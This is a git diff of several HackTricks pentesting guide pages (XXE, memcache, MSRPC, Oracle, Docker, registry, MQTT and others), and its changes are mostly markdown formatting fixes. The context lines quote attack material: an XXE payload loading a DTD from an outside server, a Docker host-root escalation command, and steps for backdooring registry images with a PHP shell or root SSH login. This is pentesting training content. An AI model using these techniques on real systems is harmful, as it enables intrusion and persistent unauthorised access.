+You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode\_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode\_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
 
 ```markup
 <!xml version="1.0" encoding="UTF-7"?-->
@@ -544,7 +544,7 @@ If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-exter
 
 Trick from [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)\
 You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.\
-Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
+Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
 
 ```markup
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x20;&#x3E;" >%a;%dtd;]>
diff --git a/pentesting/11211-memcache.md b/pentesting/11211-memcache.md
index e596f731..4a0570f3 100644
--- a/pentesting/11211-memcache.md
+++ b/pentesting/11211-memcache.md
@@ -2,10 +2,10 @@
 
 ## Protocol Information
 
-**Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. (From [wikipedia](https://en.wikipedia.org/wiki/Memcached))\
+**Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory\_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. (From [wikipedia](https://en.wikipedia.org/wiki/Memcached))\
 Although Memcached supports SASL, most instances are **exposed without authentication**.
 
-**Default port: **11211
+**Default port:** 11211
 
 ```
 PORT      STATE SERVICE
@@ -18,9 +18,9 @@ PORT      STATE SERVICE
 
 To ex-filtrate all the information saved inside a memcache instance you need to:
 
-1. Find **slabs **with **active items**
-2. Get the **key names **of the slabs detected before
-3. Ex-filtrate the **saved data **by **getting the key names**
+1. Find **slabs** with **active items**
+2. Get the **key names** of the slabs detected before
+3. Ex-filtrate the **saved data** by **getting the key names**
 
 Remember that this service is just a **cache**, so **data may be appearing and  disappearing**.
 
diff --git a/pentesting/135-pentesting-msrpc.md b/pentesting/135-pentesting-msrpc.md
index 0ea815c2..a575f325 100644
--- a/pentesting/135-pentesting-msrpc.md
+++ b/pentesting/135-pentesting-msrpc.md
@@ -2,11 +2,11 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
 ## Basic Information
 
@@ -47,9 +47,9 @@ Binding: ncadg_ip_udp:192.168.189.1[1028]
 
 You can access the RPC locator service by using four protocol sequences:
 
-* ncacn_ip_tcp and ncadg_ip_udp (TCP and UDP port 135)
-* ncacn_np (the \pipe\epmapper named pipe via SMB)
-* ncacn_http (RPC over HTTP via TCP port 80, 593, and others)
+* ncacn\_ip\_tcp and ncadg\_ip\_udp (TCP and UDP port 135)
+* ncacn\_np (the \pipe\epmapper named pipe via SMB)
+* ncacn\_http (RPC over HTTP via TCP port 80, 593, and others)
 
 ```bash
 use auxiliary/scanner/dcerpc/endpoint_mapper
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
index a2cecca9..f062bcf1 100644
--- a/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md
@@ -38,7 +38,7 @@ Add Oracle libraries to ldconfig:
 echo "/opt/oracle/instantclient_12_1/" >> /etc/ld.so.conf.d/99_oracle
 ```
 
-If you have succeeded, you should be able to run `sqlplus` from a command prompt** (you may need to log out and log back in again)**:
+If you have succeeded, you should be able to run `sqlplus` from a command prompt **(you may need to log out and log back in again)**:
 
 ```
 sqlplus <username>/<password>@<ip_address>/<SID>;
diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
index dcb42b0d..4959b00b 100644
--- a/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
+++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md
@@ -5,19 +5,19 @@
 **The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable** to this technique. In order to understand the idea behind this vulnerability, you need to consider how the authentication protocol works with the database. I will show it for version 11. The interaction with the server proceeds as follows:
 
 1. The client connects to the server and sends the user name.
-2. The server generates a session identifier (‘AUTH_SESSKEY’) and encrypts it by using AES-192. As its key, the system uses SHA-1 hash generated from user password and salt (‘AUTH_VFR_DATA’).
+2. The server generates a session identifier (‘AUTH\_SESSKEY’) and encrypts it by using AES-192. As its key, the system uses SHA-1 hash generated from user password and salt (‘AUTH\_VFR\_DATA’).
 3. The server sends an encrypted session ID and salt to the client.
 4. The client generates the key by hashing its password and received salt. The client uses this key to decrypt the session data received from the server.
 5. Based on decrypted server session ID, the client generates a new public key for future use.
 
-Now, here’s the most interesting part: The session ID ‘AUTH_SESSKEY’ sent by the server to the client has a length of 48 bytes. Of these, 40 bytes are random, and the last 8 are the duplicates of ‘0x08’. The initialization vector is 0x00 (Null).\
+Now, here’s the most interesting part: The session ID ‘AUTH\_SESSKEY’ sent by the server to the client has a length of 48 bytes. Of these, 40 bytes are random, and the last 8 are the duplicates of ‘0x08’. The initialization vector is 0x00 (Null).\
 Knowing that the last 8 bytes of the public identifier always consist of ‘0x08’, we can bruteforce this password and, moreover, do it in offline mode, which means a tremendous speed, especially if you use GPU. To mount an attack, you need to know SID, valid login (for example, ‘SYS’ account is very interesting) and, of course, have the ability to connect to the database. In this case, there will be no records, such as ‘Invalid Login Attempt’, created in the Oracle audit logs!
 
 Summing it all up:
 
-1. Use Wireshark to **intercept **the **initial traffic **during **authorization**. This will be helped by ‘tns’ filter.
-2. Extract** HEX values for AUTH_SESSKEY, AUTH_VFR_DATA**.
-3. Insert them into** **[**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
+1. Use Wireshark to **intercept** the **initial traffic** during **authorization**. This will be helped by ‘tns’ filter.
+2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
+3. Insert them into **** [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
 
 ### Using nmap and john
 
diff --git a/pentesting/15672-pentesting-rabbitmq-management.md b/pentesting/15672-pentesting-rabbitmq-management.md
index 99450ed3..83410f0d 100644
--- a/pentesting/15672-pentesting-rabbitmq-management.md
+++ b/pentesting/15672-pentesting-rabbitmq-management.md
@@ -12,7 +12,7 @@ The main page should looks like this:
 
 The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form).
 
-To manually start this module you need to execute: 
+To manually start this module you need to execute:&#x20;
 
 ```
 rabbitmq-plugins enable rabbitmq_management
@@ -25,7 +25,7 @@ Once you have correctly authenticated you will see the admin console:
 
 Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections`
 
-Note also that it's possible to** publish data inside a queue** using the API of this service with a request like:
+Note also that it's possible to **publish data inside a queue** using the API of this service with a request like:
 
 ```bash
 POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md
index 91caa7b8..9fe933a9 100644
--- a/pentesting/1883-pentesting-mqtt-mosquitto.md
+++ b/pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -13,7 +13,7 @@ PORT     STATE SERVICE                 REASON
 
 ## Pentesting MQTT
 
-**Authentication is totally optional **and even if authentication is being performed,** encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
+**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
 
 To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing:
 
@@ -60,7 +60,7 @@ if __name__ == "__main__":
 
 from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
 
-### The Publish/Subscribe Pattern <a href="b667" id="b667"></a>
+### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
 
 The publish/subscribe model is composed of:
 
@@ -71,7 +71,7 @@ The publish/subscribe model is composed of:
 
 ![](https://miro.medium.com/max/60/1\*sIxvchdgHSqAGebJjFHBAg.png?q=20)![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)Figure 01: The Publish/Subscribe Model
 
-### Packet Format <a href="f15a" id="f15a"></a>
+### Packet Format <a href="#f15a" id="f15a"></a>
 
 Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
 
@@ -79,7 +79,7 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
 
 The first field of the fixed header represents the type of the MQTT Packet. All packet types are listed in table 01.Table 01: MQTT Packet Types
 
-![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH_cyBmQ.png)
+![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)
 
 ## Shodan
 
diff --git a/pentesting/2375-pentesting-docker.md b/pentesting/2375-pentesting-docker.md
index 31c60153..9df93bc4 100644
--- a/pentesting/2375-pentesting-docker.md
+++ b/pentesting/2375-pentesting-docker.md
@@ -67,7 +67,7 @@ ctr container delete <containerName>
 
 ### Podman
 
-**Info **[**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.)****
+**Info** [**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.)****
 
 Podman is an open source, OCI ([Open Container Initiative](https://github.com/opencontainers)) compliant container engine. It is driven by Red Hat and incorporates a few major differences from Docker, such as its daemonless architecture and support for rootless containers. At their core, **both tools do the same thing: manage images and containers**. One of **Podman’s objectives is to have a Docker-compatible API**. Hence almost all CLI (command line interface) commands from the Docker CLI are also available in Podman.
 
@@ -75,7 +75,7 @@ You may find two other tools in the Podman ecosystem: Buildah and Skopeo. Builda
 
 **The major differences**
 
-**The greatest difference between Docker and Podman is their architecture**. **Docker** runs on a **client-server** architecture, while **Podman **runs on a **daemonless **architecture. But what does that mean? When working with **Docker**, you have to use the Docker CLI, which communicates with a **background daemon **(the Docker daemon). The main logic resides in the daemon, which builds images and executes containers. This **daemon runs with root privileges**. The **Podman **architecture by contrast allows you to **run **the **containers under the user that is starting the container** (fork/exec), and this user does not need any root privileges. Because **Podman has a daemonless architecture, each user running Podman can only see and modify their own containers**. There is no common daemon that the CLI tool communicates with.
+**The greatest difference between Docker and Podman is their architecture**. **Docker** runs on a **client-server** architecture, while **Podman** runs on a **daemonless** architecture. But what does that mean? When working with **Docker**, you have to use the Docker CLI, which communicates with a **background daemon** (the Docker daemon). The main logic resides in the daemon, which builds images and executes containers. This **daemon runs with root privileges**. The **Podman** architecture by contrast allows you to **run** the **containers under the user that is starting the container** (fork/exec), and this user does not need any root privileges. Because **Podman has a daemonless architecture, each user running Podman can only see and modify their own containers**. There is no common daemon that the CLI tool communicates with.
 
 Since Podman does not have a daemon, it needs a way to support running containers in the background. It therefore provides an integration with **systemd**, which allows containers to be controlled via systemd units. Depending on the Podman version, you can generate these units for existing containers or generate units that are able to create containers if they do not exist in the system. There is another integration model with systemd, which enables systemd to run inside a container. By default, Docker uses systemd to control the daemon process.
 
@@ -145,10 +145,10 @@ Server: Docker Engine - Community
   GitCommit:        fec3683
 ```
 
-If you can **contact the remote docker API with the `docker` command** you can **execute **any of the **docker **[**commands previously **commented](2375-pentesting-docker.md#basic-commands) to interest with the service.
+If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service.
 
 {% hint style="info" %}
-You can `export DOCKER_HOST="tcp://localhost:2375"` and **avoid **using the `-H` parameter with the docker command
+You can `export DOCKER_HOST="tcp://localhost:2375"` and **avoid** using the `-H` parameter with the docker command
 {% endhint %}
 
 #### Fast privilege escalation
@@ -159,7 +159,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
 
 #### Curl
 
-Sometimes you’ll see **2376 **up for the **TLS **endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.
+Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.
 
 ```bash
 #List containers
@@ -247,7 +247,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
 ### Securing Docker installation and usage
 
 * You can use the tool [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) to inspect your current docker installation.
-  *  `./docker-bench-security.sh`
+  * &#x20;`./docker-bench-security.sh`
 * You can use the tool [https://github.com/kost/dockscan](https://github.com/kost/dockscan) to inspect your current docker installation.
   * `dockscan -v unix:///var/run/docker.sock`
 * You can use the tool [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) the privileges a container will have when run with different security options. This is useful to know the implications of using some security options to run a container:
diff --git a/pentesting/27017-27018-mongodb.md b/pentesting/27017-27018-mongodb.md
index d55ae409..67f6c9b8 100644
--- a/pentesting/27017-27018-mongodb.md
+++ b/pentesting/27017-27018-mongodb.md
@@ -64,7 +64,7 @@ mongo <HOST>:<PORT>/<DB>
 mongo <database> -u <username> -p '<password>'
 ```
 
-The nmap script: _**mongodb-brute **_will check if creds are needed.
+The nmap script: _**mongodb-brute**_ will check if creds are needed.
 
 ```bash
 nmap -n -sV --script mongodb-brute -p 27017 <ip>
diff --git a/pentesting/3632-pentesting-distcc.md b/pentesting/3632-pentesting-distcc.md
index 6ca91057..bd5548b6 100644
--- a/pentesting/3632-pentesting-distcc.md
+++ b/pentesting/3632-pentesting-distcc.md
@@ -4,7 +4,7 @@
 
 Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
 
-**Default port: **3632
+**Default port:** 3632
 
 ```
 PORT     STATE SERVICE
@@ -26,7 +26,7 @@ _I don't think shodan detects this service._
 
 ## Resources
 
-* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
+* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
 * [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
 
 Post created by **Álex B (@r1p)**
diff --git a/pentesting/3690-pentesting-subversion-svn-server.md b/pentesting/3690-pentesting-subversion-svn-server.md
index 2fc24ddb..b4e673d6 100644
--- a/pentesting/3690-pentesting-subversion-svn-server.md
+++ b/pentesting/3690-pentesting-subversion-svn-server.md
@@ -5,7 +5,7 @@
 Subversion is one of many version control options available today. It's often abbreviated as SVN.\
 Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system.
 
-**Default port: **3690
+**Default port:** 3690
 
 ```
 PORT     STATE SERVICE
diff --git a/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
index 0c7f88fa..ad6fbaf7 100644
--- a/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
+++ b/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
@@ -2,7 +2,7 @@
 
 ## Basic Info
 
-The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to** keep track of which node name listens on which address**. Hence, epmd map symbolic node names to machine addresses.
+The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to **keep track of which node name listens on which address**. Hence, epmd map symbolic node names to machine addresses.
 
 **Default port**: 4369
 
@@ -79,7 +79,7 @@ HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
 ```
 
 Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
-You can use **Canape HTB machine to** **practice **how to **exploit this vuln**.
+You can use **Canape HTB machine to** **practice** how to **exploit this vuln**.
 
 ### Metasploit
 
diff --git a/pentesting/44818-ethernetip.md b/pentesting/44818-ethernetip.md
index 2cc8f85f..46cf367c 100644
--- a/pentesting/44818-ethernetip.md
+++ b/pentesting/44818-ethernetip.md
@@ -11,7 +11,7 @@ From Wikipedia article on EtherNet/IP [http://en.wikipedia.org/wiki/EtherNet/IP]
 An EtherNet/IP device is positively identified by querying TCP/44818 with a list Identities Message (0x63). The response messages will determine if it is a EtherNet/IP device and parse the information to enumerate the device.\
 From [here](https://github.com/digitalbond/Redpoint)
 
-**Default port: **44818 UDP/TCP
+**Default port:** 44818 UDP/TCP
 
 ```
 PORT      STATE SERVICE
diff --git a/pentesting/5000-pentesting-docker-registry.md b/pentesting/5000-pentesting-docker-registry.md
index 1886d2dd..239ea6b0 100644
--- a/pentesting/5000-pentesting-docker-registry.md
+++ b/pentesting/5000-pentesting-docker-registry.md
@@ -2,12 +2,12 @@
 
 ## Basic Information
 
-**Info from **[**here**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**.**
+**Info from** [**here**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**.**
 
-A **Docker registry **is a storage and distribution system for named Docker images. The same image might have multiple different versions, identified by their tags.\
-A Docker registry is organized into **Docker repositories **, where a repository holds all the versions of a specific image. The registry allows Docker users to pull images locally, as well as push new images to the registry (given adequate access permissions when applicable).
+A **Docker registry** is a storage and distribution system for named Docker images. The same image might have multiple different versions, identified by their tags.\
+A Docker registry is organized into **Docker repositories** , where a repository holds all the versions of a specific image. The registry allows Docker users to pull images locally, as well as push new images to the registry (given adequate access permissions when applicable).
 
-By default, the Docker engine interacts with **DockerHub **, Docker’s public registry instance. However, it is possible to run on-premise the open-source Docker registry/distribution, as well as a commercially supported version called **Docker Trusted Registry **. There are other public registries available online.
+By default, the Docker engine interacts with **DockerHub** , Docker’s public registry instance. However, it is possible to run on-premise the open-source Docker registry/distribution, as well as a commercially supported version called **Docker Trusted Registry** . There are other public registries available online.
 
 To pull an image from an on-premises registry, you could run a command similar to:
 
@@ -15,7 +15,7 @@ To pull an image from an on-premises registry, you could run a command similar t
 docker pull my-registry:9000/foo/bar:2.1
 ```
 
-where you pull the version of `foo/bar` image with tag `2.1 `from our on-premise registry located at `my-registry `domain, port `9000 `.\
+where you pull the version of `foo/bar` image with tag `2.1` from our on-premise registry located at `my-registry` domain, port `9000` .\
 If you used DockerHub instead, and 2.1 was also the latest version, you could run this command to pull the same image locally:
 
 ```
@@ -44,7 +44,7 @@ Some fingerprints:
 
 ### HTTP/HTTPS
 
-Docker registry may be configured to use **HTTP **or **HTTPS**. So the first thing you may need to do is **find which one** is being configured:
+Docker registry may be configured to use **HTTP** or **HTTPS**. So the first thing you may need to do is **find which one** is being configured:
 
 ```bash
 curl -s http://10.10.10.10:5000/v2/_catalog
@@ -69,7 +69,7 @@ curl -k https://192.25.197.3:5000/v2/_catalog
 {"repositories":["alpine","ubuntu"]}
 ```
 
-If the Docker Registry is requiring authentication you can[** try to brute force it using this**](../brute-force.md#docker-registry).\
+If the Docker Registry is requiring authentication you can[ **try to brute force it using this**](../brute-force.md#docker-registry).\
 **If you find valid credentials you will need to use them** to enumerate the registry, in `curl` you can use them like this:
 
 ```bash
@@ -171,7 +171,7 @@ docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
 ### Backdooring WordPress image
 
 In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.\
-**Create **the **backdoor**:
+**Create** the **backdoor**:
 
 {% code title="shell.php" %}
 ```bash
@@ -189,7 +189,7 @@ RUN chmod 777 /app/shell.php
 ```
 {% endcode %}
 
-**Create **the new image, **check **it's created, and **push **it:
+**Create** the new image, **check** it's created, and **push** it:
 
 ```bash
 docker build -t 10.10.10.10:5000/wordpress .
 #Create
@@ -200,7 +200,7 @@ docker push registry:5000/wordpress #Push it
 ### Backdooring SSH server image
 
 Suppose that you found a Docker Registry with a SSH image and you want to backdoor it.\
-**Download **the image and **run **it:
+**Download** the image and **run** it:
 
 ```bash
 docker pull 10.10.10.10:5000/sshd-docker-cli
@@ -215,7 +215,7 @@ docker cp 4c989242c714:/etc/ssh/sshd_config .
 
 And modify it to set: `PermitRootLogin yes`
 
-Create a **Dockerfile **like the following one:
+Create a **Dockerfile** like the following one:
 
 {% tabs %}
 {% tab title="Dockerfile" %}
@@ -227,7 +227,7 @@ RUN echo root:password | chpasswd
 {% endtab %}
 {% endtabs %}
 
-**Create **the new image, **check **it's created, and **push **it:
+**Create** the new image, **check** it's created, and **push** it:
 
 ```bash
 docker build -t 10.10.10.10:5000/sshd-docker-cli .
 #Create
diff --git a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
index 9bff802c..87b36dbb 100644
--- a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
+++ b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
@@ -1,6 +1,6 @@
 # 50030,50060,50070,50075,50090 - Pentesting Hadoop
 
-**Information taken from the book **[**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2)****
+**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2)****
 
 ## **Basic Information**
 
diff --git a/pentesting/512-pentesting-rexec.md b/pentesting/512-pentesting-rexec.md
index 7e73bbbc..7eb21222 100644
--- a/pentesting/512-pentesting-rexec.md
+++ b/pentesting/512-pentesting-rexec.md
@@ -2,7 +2,7 @@
 
 ## Basic Information
 
-It is a service that **allows you to execute a command inside a host** if you know valid **credentials **(username and password).
+It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password).
 
 **Default Port:** 512
 
diff --git a/pentesting/515-pentesting-line-printer-daemon-lpd.md b/pentesting/515-pentesting-line-printer-daemon-lpd.md
index 27454c1c..154696f2 100644
--- a/pentesting/515-pentesting-line-printer-daemon-lpd.md
+++ b/pentesting/515-pentesting-line-printer-daemon-lpd.md
@@ -1,9 +1,9 @@
 # 515 - Pentesting Line Printer Daemon (LPD)
 
 The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\
-The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript **or **PJL print jobs**. 
+The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**.&#x20;
 
-The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**. **They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more:
+The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more:
 
 ```
 lpdprint.py hostname filename
diff --git a/pentesting/5353-udp-multicast-dns-mdns.md b/pentesting/5353-udp-multicast-dns-mdns.md
index 862005b3..b102a5b9 100644
--- a/pentesting/5353-udp-multicast-dns-mdns.md
+++ b/pentesting/5353-udp-multicast-dns-mdns.md
@@ -3,7 +3,7 @@
 ## Basic Information
 
 Apple Bonjour and Linux zero-configuration networking implementations (e.g., Avahi) use mDNS to discover network peripherals within the local network.\
-**Default port: **5353/UDP
+**Default port:** 5353/UDP
 
 ```
 PORT     STATE SERVICE
